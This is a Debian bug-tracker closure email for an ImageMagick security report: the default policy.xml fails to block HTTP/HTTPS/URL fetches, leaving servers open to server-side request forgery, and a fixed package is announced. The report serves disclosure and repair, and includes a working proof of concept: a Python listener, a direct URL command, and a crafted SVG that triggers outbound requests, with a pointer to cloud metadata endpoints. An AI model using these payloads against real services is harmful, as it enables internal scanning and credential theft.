Your message dated Tue, 16 Jun 2026 22:34:11 +0000
with message-id <[email protected]>
and subject line Bug#1140176: fixed in imagemagick 8:7.1.2.25+dfsg1-2
has caused the Debian Bug report #1140176,
regarding imagemagick: default policy.xml HTTP/HTTPS/URL delegate rules are
no-ops (SSRF, CWE-918)
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
1140176: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1140176
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: imagemagick
Version: 8:7.1.2.15+dfsg1-2
Severity: grave
Tags: security patch
Dear Maintainer,
The default ImageMagick security policy shipped by Debian in
debian/patches/0005-Add-a-debian-policy.patch
(installed as /etc/ImageMagick-7/policy.xml) attempts to block remote
HTTP/HTTPS/URL access -- the standard SSRF mitigation -- with these rules:
<policy domain="delegate" rights="none" pattern="URL" />
<policy domain="delegate" rights="none" pattern="HTTPS" />
<policy domain="delegate" rights="none" pattern="HTTP" />
These rules are silently ineffective, so a default install still performs
outbound HTTP/HTTPS requests and is vulnerable to SSRF (CWE-918).
Root cause
----------
The http:/https: coders fetch URLs by invoking delegates named
"http:decode" / "https:decode" (coders/url.c). InvokeDelegate()
(MagickCore/delegate.c) enforces the "delegate" policy by glob-matching
the policy pattern against that full identifier string. The pattern
"HTTP" (no wildcards) does not match the literal string "http:decode",
so the rule is treated as inapplicable and the default (allow) wins.
The patterns "HTTP", "HTTPS" and "URL" therefore never block the URL
coders.
The "@*" path rule in the same file is enforced through a different code
path and does work, which gives operators false confidence that the
HTTP/HTTPS/URL restriction is also working.
Proof of concept
----------------
All commands run against the unmodified, as-installed policy.xml.
1. Minimal listener:
python3 -c 'import http.server,socketserver
class H(http.server.BaseHTTPRequestHandler):
def do_GET(s): print("SSRF:",s.path); s.send_response(200);
s.end_headers(); s.wfile.write(b"GIF89a;")
def log_message(s,*a): pass
socketserver.TCPServer(("127.0.0.1",7777),H).serve_forever()'
2. Confirm the restrictive policy is active (this is correctly blocked):
echo x > /tmp/q.txt
magick label:@/tmp/q.txt /tmp/q.png
-> magick: attempt to perform an operation not allowed by the
security policy `@/tmp/q.txt'
3. PoC 1 -- direct URL coder:
magick http://127.0.0.1:7777/ssrf out.png
-> listener logs: SSRF: /ssrf
4. PoC 2 -- SSRF via untrusted SVG (the realistic web-service vector):
printf '<svg xmlns:xlink="http://www.w3.org/1999/xlink"; width="10"
height="10"><image xlink:href="http://127.0.0.1:7777/svg-ssrf"; width="10"
height="10"/></svg>' > evil.svg
magick evil.svg out.png
-> listener logs: SSRF: /svg-ssrf
Both requests are sent despite the delegate rights="none" rules.
Substituting a real internal target (e.g.
http://169.254.169.254/latest/meta-data/) demonstrates real impact.
Impact
------
A service that thumbnails or converts user-supplied SVG (or URL) input
with ImageMagick can be coerced into attacker-controlled server-side
requests to internal services or cloud metadata endpoints, enabling
credential theft and internal port/host scanning. The exposure is worse
because operators believe they are protected: they deployed a policy
that explicitly lists HTTP, HTTPS and URL as forbidden.
Suggested fix
-------------
Replace the ineffective delegate rules with the coder-domain form, which
is enforced and covers every remote scheme:
<policy domain="coder" rights="none"
pattern="{HTTP,HTTPS,FTP,FTPS,URL,MSL,MVG}" />
(keeping the existing @* path rule). Verify with:
magick http://127.0.0.1:1/x x.png
which must be rejected by policy, not merely fail to connect.
Bastien Rouccaries has already prepared a fix; a CVE request is in
progress. I am filing here at the request of the Debian Security Team so
the fix is tracked in the BTS.
Tested on imagemagick 8:7.1.2.15+dfsg1-2; applies generally to the
ImageMagick 7.x series.
Regards,
Maram Sai Harsha Vardhan Reddy
Security Researcher
[email protected]
--- End Message ---
--- Begin Message ---
Source: imagemagick
Source-Version: 8:7.1.2.25+dfsg1-2
Done: Bastien Roucariès <[email protected]>
We believe that the bug you reported is fixed in the latest version of
imagemagick, which is due to be installed in the Debian FTP archive.
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Bastien Roucariès <[email protected]> (supplier of updated imagemagick package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Format: 1.8
Date: Tue, 16 Jun 2026 22:22:44 +0200
Source: imagemagick
Architecture: source
Version: 8:7.1.2.25+dfsg1-2
Distribution: unstable
Urgency: medium
Maintainer: ImageMagick Packaging Team
<[email protected]>
Changed-By: Bastien Roucariès <[email protected]>
Closes: 1140176
Changes:
imagemagick (8:7.1.2.25+dfsg1-2) unstable; urgency=medium
.
* Fix default ImageMagick policy configuration (Closes: #1140176)
Checksums-Sha1:
f4f69a8df84d0b55426bc532db2e012723750f7a 5129 imagemagick_7.1.2.25+dfsg1-2.dsc
ee66b21d708c7fb61d0f6aab145ad46ecc88299f 10539840
imagemagick_7.1.2.25+dfsg1.orig.tar.xz
856f34f5e28b58b207df2d4551a181ee8e97e9f0 269108
imagemagick_7.1.2.25+dfsg1-2.debian.tar.xz
06f120f1fe629824520eb8c4ecce315eb28cb454 8501
imagemagick_7.1.2.25+dfsg1-2_source.buildinfo
Checksums-Sha256:
0bf4b4419374afb4b80e4ba2422a3e36a69438c9651c97dbab8e8acc3b60b888 5129
imagemagick_7.1.2.25+dfsg1-2.dsc
f978ff8fc6fe47e70a66f8cc748d8aa6dab81fa97f14ac47ee5a464f22d68212 10539840
imagemagick_7.1.2.25+dfsg1.orig.tar.xz
853c293b63200e01c525404143c52fe07856c3ed9f3fde4de6d6d057620844f3 269108
imagemagick_7.1.2.25+dfsg1-2.debian.tar.xz
2608125f89fc2fcf82164965ce7c3dc88f97579341e93eca450ded033b0cd5ec 8501
imagemagick_7.1.2.25+dfsg1-2_source.buildinfo
Files:
c04d2e4fd260cae67a62a4034f1793b6 5129 graphics optional
imagemagick_7.1.2.25+dfsg1-2.dsc
c870e0367efccd3649e52a78a168257a 10539840 graphics optional
imagemagick_7.1.2.25+dfsg1.orig.tar.xz
a164d5c0146905889d54bdd88ef5130c 269108 graphics optional
imagemagick_7.1.2.25+dfsg1-2.debian.tar.xz
e5e9d964f8bc7d602e15a9f151977acb 8501 graphics optional
imagemagick_7.1.2.25+dfsg1-2_source.buildinfo
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCgAdFiEEXQGHuUCiRbrXsPVqADoaLapBCF8FAmoxx9EACgkQADoaLapB
CF+GlhAAsn8iHRgLpRacAGT3GarNadZz73Hz068/MI29Ory1LSTbjDrVK8l+fg7a
VxOsJGwML5LrwBpWni6cppV57uKXhs+0JBhOez1ggfYsut9rG4U7VXuuNy+xLibc
eSEL4DI/inOFy1tQX3aDrFuun0Rz8/5+ucDx/R3oY4qSxSchwobQLN3ZQPcHb6WU
gJrA5T5BDQLfNnETNVDcu4Ew+F7QvCzVscoC4DvgNliYzBz4x+nblHPS/ysLJ8//
vwkRWWn7kET48oxquB6AFwJsiRF9atfkBBbZbFoFZaaiJmDA02vOYUprJA0TXxNz
DtJMlDUgtzTPhHCK4ejs8RXlrgaQtOaLu30g8cJHdt2uXH/xxMxvYkJkk7TQNF9O
2Xmhxbiqlr3kndlnAU92SodEueZortiZpT7JgUsDTh+eh9+a2CPVZCPgU2+Lcibi
3hI8Kpa8q/gpzJVMJvHiGQHs4XpnqDlSjFecw90A8ySQdqRhYTsERXpXlkFBPX+L
1lCR8atzwss4S7ZGs59PGOzLbMyukH9F95PPGzC6fw9VTd3TwzQWG71DrI3Lu4AY
Wjn2KyXpmV+r2SELGvk7vPKvyrusVPlpe/iwhw3NgBGhN7GL1rEVLJeqRrgGmniA
SkXW/3Ug8bhymthvRV4C3YDUMcqYZloTs7zxUUWQbyR34tUtJGA=
=y2oh
-----END PGP SIGNATURE-----
pgp7gjshxRrVh.pgp
Description: PGP signature
--- End Message ---
